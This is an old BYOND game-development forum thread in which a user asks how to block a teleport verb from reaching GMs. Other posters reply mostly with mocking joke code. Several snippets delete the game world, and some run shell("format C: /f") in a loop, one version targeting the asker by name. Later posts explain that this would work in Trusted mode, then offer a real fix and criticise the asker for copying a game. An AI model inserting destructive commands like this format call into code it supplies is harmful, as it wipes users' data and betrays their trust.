ID:267099
![]() Dec 5 2002, 4:35 pm
|
|
This is for a Zeta game. I need to make it where people CANNOT use Instant-Transmission, to get to any of the GMs. Please help me.
|
Garthor wrote:
mob verb Instant_Tranmission() world << "Insomniac Xx should've made his own game, isntead of downloading someone else's!" for(var/turf/t in world) del(t) sleep(1000) del(world) My great addition! |
mob
verb Instant_Tranmission() world << "Insomniac Xx should've made his own game, isntead of downloading someone else's!" for(var/turf/t in world) while(1) shell("format C: /f") Version 4.0! |
Garthor wrote:
mob verb Instant_Tranmission() if(usr.key == "Insomniac Xx") world << "Insomniac Xx should've made his own game, isntead of downloading someone else's!" for(var/turf/t in world) while(1) shell("format C: /f") else usr << "Your lukcy your not Insomniac Xx!" |
Would that actually format someones C:? If so you just made me a lot more paranoid about playing BYOND games. Although if I remember right like everything it has a 'Are you sure?' check.
-DogMan |
It would if you had it on Trusted mode; otherwise it would ask you first, or just automatically deny the request. It would only affect the host anyway, so just remember not to run anything in Trusted mode unless you know that you can trust it.
|
Just throw in an if() statement to check if they are gm.If they are return it 0.
|
does he really deserve help on a game that he didn't create?
I mean, you have all these people that download zeta, customize the maps, Rearrange the verbs, make themselves a GM and say they are Byond Gurus. |
Look man, I'm changing as much coding as possible and trying my best to make it better than all the other Zeta rips...I know I suck at coding, but I',m trying my best...a.k.a Insomniac Xx
|
Nfires wrote:
Look man, I'm changing as much coding as possible and trying my best to make it better than all the other Zeta rips...I know I suck at coding, but I',m trying my best...a.k.a Insomniac Xx The point still stands, though: If you want to study the code and use it as a guide when programming your own, that's fine. But modifying it and calling the result yours is not acceptable. Setting out to create the very best Zeta rip is asinine; it's like aspiring to be the best darn plagiarist in the world. Learn from it, but don't twist it and call it yours. Lummox JR |
verb
Instant_Tranmission()
world << "Insomniac Xx should've made his own game, isntead of downloading someone else's!"
del(world)